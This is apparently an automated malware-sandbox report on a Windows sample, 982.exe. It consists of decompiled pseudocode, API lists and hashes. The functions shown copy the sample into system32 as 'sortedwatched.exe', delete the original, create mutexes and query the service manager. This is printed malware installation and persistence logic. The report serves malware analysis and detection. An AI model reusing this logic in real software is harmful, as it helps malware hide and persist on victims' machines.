                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 164 401000-401023 call 401503 167 401082-401084 164->167 168 401025-401027 164->168 170 401085-40108a 167->170 169 401029-40103e 168->169 171 401040-401050 GetFileAttributesW 169->171 172 401079-401080 169->172 173 401052-401062 CreateDirectoryW 171->173 174 401075-401077 171->174 172->167 172->169 173->172 175 401064-40106f GetLastError 173->175 174->172 176 401071-401073 174->176 175->172 175->176 176->170
                  C-Code - Quality: 100%
                  			E00401000() {
                  				short _v524;
                  				signed int _t14;
                  				signed char _t16;
                  				struct _SECURITY_ATTRIBUTES* _t24;
                  				void* _t25;
                  
                  				E00401503( &_v524, 0x208);
                  				if( *0x416840 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t24 = 0;
                  				do {
                  					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
                  					_t24 =  &(_t24->nLength);
                  					 *(_t25 + _t24 - 0x20a) = _t14;
                  					if(_t14 != 0x5c) {
                  						goto L8;
                  					}
                  					_t16 = GetFileAttributesW( &_v524); // executed
                  					if(_t16 != 0xffffffff) {
                  						if((_t16 & 0x00000010) == 0) {
                  							L6:
                  							return 0;
                  						}
                  						goto L8;
                  					}
                  					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
                  						goto L6;
                  					}
                  					L8:
                  				} while ( *(_t24 + 0x416840) != 0);
                  				goto L9;
                  			}









                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 674977465-2966989349
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 4010dc-40112a call 401a52 call 401b09 DeleteFileW
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
                  				short _v524;
                  				int _t8;
                  
                  				_t12 = E00401A52(0x412000, 0x7b38aa91);
                  				 *0x4143a4( &_v524, 0x104, _t3, "C:\Windows\system32\sortedwatched.exe");
                  				L00401B09(_t12);
                  				_t8 = DeleteFileW( &_v524); // executed
                  				return _t8;
                  			}






                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw
                  • API String ID: 366827715-662138423
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$ErrorLastProcess$AllocateCountFreeOpenServiceTick
                  • String ID:
                  • API String ID: 23911195-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 183 40108b-4010ca memset SHFileOperationW 184 4010d1 183->184 185 4010cc-4010cf 183->185 186 4010d3-4010db 184->186 185->184 185->186
                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
                  				intOrPtr _v18;
                  				struct _SHFILEOPSTRUCTW _v36;
                  				int _t12;
                  				intOrPtr _t15;
                  				intOrPtr _t18;
                  				intOrPtr _t19;
                  
                  				_t18 = __edx;
                  				_t19 = __ecx;
                  				memset( &_v36, 0, 0x1e);
                  				_v36.pFrom = _t19;
                  				_v36.pTo = _t18;
                  				_v36.fFlags = 0xe14;
                  				_t15 = 1;
                  				_v36.wFunc = 1;
                  				_t12 = SHFileOperationW( &_v36); // executed
                  				if(_t12 != 0 || _v18 != _t12) {
                  					_t15 = 0;
                  				}
                  				return _t15;
                  			}










                  APIs
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 00401091
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 1721435463-2966989349
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x412340, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132); // executed
                  				 *0x41365c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
                  				short _v132;
                  				void* _t5;
                  				void* _t10;
                  
                  				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
                  				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
                  				L00401B09(_t5);
                  				_t10 = CreateMutexW(0, 0,  &_v132); // executed
                  				 *0x41548c = _t10;
                  				return 0 | _t10 != 0x00000000;
                  			}







                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
                  				short _v524;
                  				int _t8;
                  
                  				_t12 = E00401A52(0x412000, 0x7b38aa91);
                  				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
                  				L00401B09(_t12);
                  				_t8 = DeleteFileW( &_v524); // executed
                  				return _t8;
                  			}






                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00401000() {
                  				short _v524;
                  				signed int _t14;
                  				signed char _t16;
                  				struct _SECURITY_ATTRIBUTES* _t24;
                  				void* _t25;
                  
                  				E00401503( &_v524, 0x208);
                  				if( *0x416840 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t24 = 0;
                  				do {
                  					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
                  					_t24 =  &(_t24->nLength);
                  					 *(_t25 + _t24 - 0x20a) = _t14;
                  					if(_t14 != 0x5c) {
                  						goto L8;
                  					}
                  					_t16 = GetFileAttributesW( &_v524); // executed
                  					if(_t16 != 0xffffffff) {
                  						if((_t16 & 0x00000010) == 0) {
                  							L6:
                  							return 0;
                  						}
                  						goto L8;
                  					}
                  					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
                  						goto L6;
                  					}
                  					L8:
                  				} while ( *(_t24 + 0x416840) != 0);
                  				goto L9;
                  			}









                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID:
                  • API String ID: 674977465-0
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 4.65%

                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                  				intOrPtr _t1;
                  				int _t9;
                  				intOrPtr _t16;
                  				void* _t20;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t20 = __edx;
                  				_t16 = __ecx;
                  				_t1 =  *0x415488; // 0x3c4e0000
                  				 *0x4164e0 = _t1;
                  				E0040F16B();
                  				E0040F149();
                  				E0040F26C();
                  				E0040F292();
                  				E0040F3C5(); // executed
                  				E0040F43E(__ebx); // executed
                  				E0040F2EE(_t24); // executed
                  				_t9 = lstrcmpiW("C:\Users\luketaylor\982.exe", 0x416840);
                  				if(_t9 != 0) {
                  					E0040F63A(_t16, _t20, __edi, __eflags); // executed
                  					__eflags =  *0x415f4c;
                  					if( *0x415f4c == 0) {
                  						__eflags = 0;
                  						E00401CC2(0x416840, 0, _t16, 0);
                  					} else {
                  						E0040F7A0(); // executed
                  					}
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return _t9; // executed
                  				}
                  			}









                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\982.exe,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNELBASE(C:\Users\user\982.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
                    • Part of subcall function 0040F3C5: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F3EF
                    • Part of subcall function 0040F3C5: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F401
                    • Part of subcall function 0040F3C5: GetFileSize.KERNEL32(00000000,00000000,?,0040C894,?,?,0040F111), ref: 0040F410
                    • Part of subcall function 0040F3C5: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F41A
                    • Part of subcall function 0040F3C5: UnmapViewOfFile.KERNEL32(00000000,?,0040C894,?,?,0040F111), ref: 0040F426
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F42D
                    • Part of subcall function 0040F3C5: CloseHandle.KERNELBASE(00000000), ref: 0040F434
                    • Part of subcall function 0040F43E: GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                    • Part of subcall function 0040F43E: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                    • Part of subcall function 0040F43E: _snprintf.NTDLL ref: 0040F4EF
                    • Part of subcall function 0040F2EE: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,?), ref: 0040F33C
                    • Part of subcall function 0040F2EE: _snwprintf.NTDLL ref: 0040F3A1
                    • Part of subcall function 0040F2EE: DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  • lstrcmpiW.KERNEL32(C:\Users\user\982.exe,C:\Windows\system32\sortedwatched.exe,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F966
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreateNameView_snwprintf$ByteCharComputeComputerCrc32DeleteFolderManagerMappingModuleMultiOpenPathServiceSizeUnmapWide_snprintflstrcmpi
                  • String ID: C:\Users\user\982.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 2225404385-3515039387
                  • Opcode ID: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction ID: bd7696f8d282200fc694e3ca5d6ba9f1d35f343fb67aa0c3943ac94685ea35c3
                  • Opcode Fuzzy Hash: 9d71c5ed171c76577c1e636bc27e42a5a757cd4c723c02abcc556cc38c7ae8c3
                  • Instruction Fuzzy Hash: 29F08232619501A6D634B7F7B8067CB12855F81319B16847FF440B5DD2DE3C884A856E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040C84E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                  				signed int _t6;
                  				long _t9;
                  				void* _t12;
                  				void* _t17;
                  				signed int _t19;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t17 = __edi;
                  				_t12 = __ebx;
                  				_t6 = GetTickCount();
                  				_t16 = _t6 % 0xfa0;
                  				_t19 = _t6 % 0xfa0; // executed
                  				E0040C493(); // executed
                  				_t9 = E0040C601(_t24);
                  				if(_t9 != 0) {
                  					_t5 = _t19 + 0xfa0; // 0xfa0
                  					_t9 = WaitForSingleObject( *0x414e6c, _t5);
                  					while(_t9 == 0x102) {
                  						_t9 = WaitForSingleObject( *0x414e6c, E0040C78F(_t12, _t16, _t17));
                  					}
                  				}
                  				return _t9;
                  			}










                  APIs
                  • GetTickCount.KERNEL32(00000000,?,?,0040F111), ref: 0040C856
                    • Part of subcall function 0040C493: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C4A8
                    • Part of subcall function 0040C493: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00415488,00000000,00000000,00000000,00000000), ref: 0040C4EB
                    • Part of subcall function 0040C601: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                    • Part of subcall function 0040C601: SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                    • Part of subcall function 0040C601: ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                    • Part of subcall function 0040C601: ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                    • Part of subcall function 0040C601: CloseHandle.KERNELBASE ref: 0040C677
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 0040C882
                  • WaitForSingleObject.KERNEL32(00000000), ref: 0040C89B
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction ID: c69442cc489c2c4f0668fa5bec6b92153ca26a26e28d5911284e54d6033ab6a8
                  • Opcode Fuzzy Hash: 0633e936a088fcb8b38c62daec32763aaef1651ac7ccb6cf648d26e93326d8c7
                  • Instruction Fuzzy Hash: 89E0E532500101DBE7207BB1AC894BA7299EB85312F14C376FC59E22E4DE798D1096EE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath
                  • String ID: C:\Windows\system32
                  • API String ID: 1514166925-2896066436
                  • Opcode ID: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction ID: 5dcbbc3557999cadc85141e505fa9820d1d618d2a08e95aef40471cc6c79aa6f
                  • Opcode Fuzzy Hash: df561b519f871671f3b06fb1d6ed2fb3f6520bcfed05d60632229694f690721c
                  • Instruction Fuzzy Hash: EBB011E0B80200BEFE000230AE0EEB3200CCB80B00F2288203E00E0080EAA8C88082B8
                  Uniqueness

                  Uniqueness Score: 0.19%

                  C-Code - Quality: 94%
                  			E0040C78F(void* __ebx, void* __edx, void* __edi) {
                  				void* __ecx;
                  				intOrPtr _t6;
                  				intOrPtr _t7;
                  				signed int _t10;
                  				void* _t15;
                  				signed int _t21;
                  				signed int _t23;
                  				void* _t24;
                  				void* _t29;
                  				void* _t32;
                  				void* _t34;
                  
                  				_t34 = __edx;
                  				_t6 =  *0x415484; // 0x0
                  				_t7 = _t6;
                  				if(_t7 == 0) {
                  					E0040632A(__eflags); // executed
                  					E004076C6(__eflags); // executed
                  					_t10 = E0040F92D(__ebx, _t29, _t34, __edi, __eflags);
                  					__eflags = _t10;
                  					if(_t10 != 0) {
                  						goto L12;
                  					} else {
                  						 *0x415484 = 1;
                  						goto L11;
                  					}
                  				} else {
                  					_t15 = _t7 - 1;
                  					if(_t15 == 0) {
                  						E00408922(__eflags);
                  						E00408CD5(__eflags);
                  						E00409BFD(__eflags);
                  						E0040A2C9(__eflags);
                  						E0040B6B5(__eflags);
                  						_push(_t29);
                  						_t21 = E004060C5();
                  						_t32 = _t29;
                  						__eflags = _t21;
                  						if(_t21 == 0) {
                  							L12:
                  							 *0x415484 = 3;
                  							goto L13;
                  						} else {
                  							_push(_t32);
                  							_t23 = E0040FCD8(E0040FA9B());
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								goto L12;
                  							} else {
                  								 *0x415484 = 2;
                  								L11:
                  								_t2 = GetTickCount() % 0xfa0;
                  								__eflags = _t2;
                  								return 0xfa0 + _t2;
                  							}
                  						}
                  					} else {
                  						_t24 = _t15 - 1;
                  						if(_t24 == 0) {
                  							 *0x415484 = 2;
                  							return E0040C682(__edi, __eflags);
                  						} else {
                  							if(_t24 == 1) {
                  								SetEvent( *0x414e6c);
                  							}
                  							L13:
                  							return 0;
                  						}
                  					}
                  				}
                  			}















                  APIs
                  • SetEvent.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C7AD
                  • GetTickCount.KERNEL32(?,0040C894,?,?,0040F111), ref: 0040C82C
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID:
                  • API String ID: 180926312-0
                  • Opcode ID: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction ID: be868de2910ec1a5e810c43775452dbe779e15a4cf7b5af956ef61f3f0da2497
                  • Opcode Fuzzy Hash: 69affc29043669191e381e6b1b6223cf0c3bd66907fecb4a49175b6604a6839f
                  • Instruction Fuzzy Hash: 3D0196B1514502C9E7147BB5A94A3AB3658AB8031EF10C23FA402B56D3EF3D8454952E
                  Uniqueness

                  Uniqueness Score: 2.98%

                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
                  				intOrPtr _v18;
                  				struct _SHFILEOPSTRUCTW _v36;
                  				int _t12;
                  				intOrPtr _t15;
                  				intOrPtr _t18;
                  				intOrPtr _t19;
                  
                  				_t18 = __edx;
                  				_t19 = __ecx;
                  				memset( &_v36, 0, 0x1e);
                  				_v36.pFrom = _t19;
                  				_v36.pTo = _t18;
                  				_v36.fFlags = 0xe14;
                  				_t15 = 1;
                  				_v36.wFunc = 1;
                  				_t12 = SHFileOperationW( &_v36); // executed
                  				if(_t12 != 0 || _v18 != _t12) {
                  					_t15 = 0;
                  				}
                  				return _t15;
                  			}










                  APIs
                  • memset.NTDLL ref: 004010A0
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?,0040F65D,00416840,00000104), ref: 004010C2
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID:
                  • API String ID: 1721435463-0
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 100%
                  			E0040F92D(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                  				intOrPtr _t1;
                  				int _t9;
                  				intOrPtr _t16;
                  				void* _t20;
                  				void* _t24;
                  
                  				_t24 = __eflags;
                  				_t20 = __edx;
                  				_t16 = __ecx;
                  				_t1 =  *0x415488; // 0x3c4e0000
                  				 *0x4164e0 = _t1;
                  				E0040F16B();
                  				E0040F149();
                  				E0040F26C();
                  				E0040F292();
                  				E0040F3C5(); // executed
                  				E0040F43E(__ebx); // executed
                  				E0040F2EE(_t24); // executed
                  				_t9 = lstrcmpiW(0x416c50, 0x416840);
                  				if(_t9 != 0) {
                  					E0040F63A(_t16, _t20, __edi, __eflags); // executed
                  					__eflags =  *0x415f4c;
                  					if( *0x415f4c == 0) {
                  						__eflags = 0;
                  						E00401CC2(0x416840, 0, _t16, 0);
                  					} else {
                  						E0040F7A0(); // executed
                  					}
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					return _t9; // executed
                  				}
                  			}









                  APIs
                    • Part of subcall function 0040F16B: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,0040F93D,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F174
                    • Part of subcall function 0040F16B: CloseServiceHandle.ADVAPI32(00000000,?,0040C894,?,?,0040F111), ref: 0040F189
                    • Part of subcall function 0040F149: GetModuleFileNameW.KERNEL32(00000000,00416C50,00000104,00000000,00000102,0040F942,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F162
                    • Part of subcall function 0040F292: _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F3C5: CreateFileW.KERNELBASE(00416C50,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F3DA
